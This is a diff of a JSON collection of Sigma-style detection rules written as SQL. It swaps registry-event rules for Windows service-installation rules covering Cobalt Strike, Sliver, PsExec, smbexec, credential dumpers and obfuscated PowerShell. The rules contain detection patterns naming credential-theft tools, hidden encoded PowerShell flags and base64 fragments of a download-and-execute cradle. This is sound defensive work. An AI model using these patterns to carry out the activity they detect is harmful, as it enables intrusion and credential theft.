"SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ "attack.execution", - "attack.t1112" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "status": "test", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "HybridConnectionManager Service Installation - Registry", - "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", "status": "experimental", - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1608" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7034') AND (param1 LIKE '%Message Queuing%' ESCAPE '\\' OR (Binary LIKE '%4d0053004d005100%' ESCAPE '\\' OR Binary LIKE '%6d0073006d007100%' ESCAPE '\\')))" ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" + "filename": "win_system_service_terminated_unexpectedly.yml" }, { - "title": "Security Support Provider (SSP) Added to LSA Configuration", - "id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", + "title": "PowerShell Scripts Installed as Services", + "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", "status": "test", - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "author": "iwillkeepwatch", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1547.005" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "registry_event_ssp_added_lsa_config.yml" + "filename": "win_system_powershell_script_installed_as_service.yml" }, { - "title": "CMSTP Execution Registry Event", - "id": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "status": "test", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", "tags": [ - "attack.defense_evasion", + "attack.lateral_movement", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1021.002", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\cmmgr32.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" ], - "filename": "registry_event_cmstp_execution_by_registry.yml" + "filename": "win_system_hack_smbexec.yml" }, { - "title": "Removal Of AMSI Provider Registry Keys", - "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", "status": "test", - "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", - "author": "frack113", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" ], - "filename": "registry_delete_removal_amsi_registry_key.yml" + "filename": "win_system_apt_turla_service_png.yml" }, { - "title": "Terminal Server Client Connection History Cleared - Registry", - "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "status": "test", - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Service Installation", + "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "status": "experimental", + "description": "Detects suspicious service installation commands", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" ], - "filename": "registry_delete_mstsc_history_cleared.yml" + "filename": "win_system_susp_service_installation.yml" }, { - "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", - "id": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "title": "RTCore Suspicious Service Installation", + "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", "status": "experimental", - "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate administrators removing applications (should always be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" ], - "filename": "registry_delete_exploit_guard_protected_folders.yml" + "filename": "win_system_susp_rtcore64_service_install.yml" }, { - "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", - "id": "f50f3c09-557d-492d-81db-9064a8d4e211", + "title": "Sliver C2 Default Service Installation", + "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "status": "experimental", - "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": 